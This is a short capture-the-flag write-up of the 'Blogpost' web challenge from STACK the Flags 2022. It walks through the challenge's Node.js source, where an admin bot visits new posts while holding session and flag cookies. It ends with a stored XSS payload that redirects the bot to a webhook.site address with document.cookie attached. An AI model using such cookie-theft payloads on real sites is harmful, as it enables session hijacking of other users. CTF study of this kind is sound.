[STACK the Flags 2022] Writeup

1. 

It was an interesting week, I had 3 ctfs this weekend and just ended up centering on only one of them. So I didn't grind hard enough to say I did something in this CTF. The server connection was wacky for me, and I don't even have any decent screenshots to squeeze a writeup out of! So this writeup is more of a belated review. It's focused on analyzing the source code, and spotting the vulnerabilities. 

 

2. THE CHALL

• Blogpost

 

 

Blogpost - Web

Jaga created an internal social media platform for the company. Can you leak anyone's information?

After experimenting with the site, we discover a page where we can create some posts. Looks like CSRF or XSS. Test if we can inject javascript code into the website, and the payload below works. 

<script>console.log(1234)</script>

which means possibility of XSS. 

 

Don't forget we're provided with the source code. 

 router.post('/post', auth, async (req, res)=>{
        const { title, content } = req.body;
        if (title && content) {
            db.addPost(title, req.user.username, content)
                .then(async () => {
                    if (req.user.username != 'admin') { 
                        await viewPosts();
                    }
                    res.status(200).send(response('Success'))})
                .catch(() => {console.log('oof');res.status(500).send(response('Error'))});
        }
    });

Hmm, if the user isn't admin, they "view posts." What exactly does viewPosts() do?

import { viewPosts } from '../bot.js';

export const viewPosts = async () => {
    try {
		const browser = await puppeteer.launch(browser_options);
		let context = await browser.createIncognitoBrowserContext();
		let page = await context.newPage();

		let token = await sign({ username: 'admin' });
		await page.setCookie({
			name: "session",
			'value': token,
			domain: "127.0.0.1",
		});
		await page.setCookie({
			name: "flag",
			'value': "REDACTED",
			domain: "127.0.0.1",
		});
		await page.goto('http://127.0.0.1:1337/blog', {
			waitUntil: 'networkidle2',
			timeout: 8000
		});
		await browser.close();
    } catch(e) {
        console.log(e);
    }
};

This part of the bot.js file indicates that the admin, or a bot, will visit the page whenever we create a post. Our job here is to exploit it and get the flag, which is stored in one of the cookies. 

 

Finally, all of this boils down to simple XSS. The payload would be...

document.location.href = "<webhook.site>?c=" + document.cookie;

 

 

gg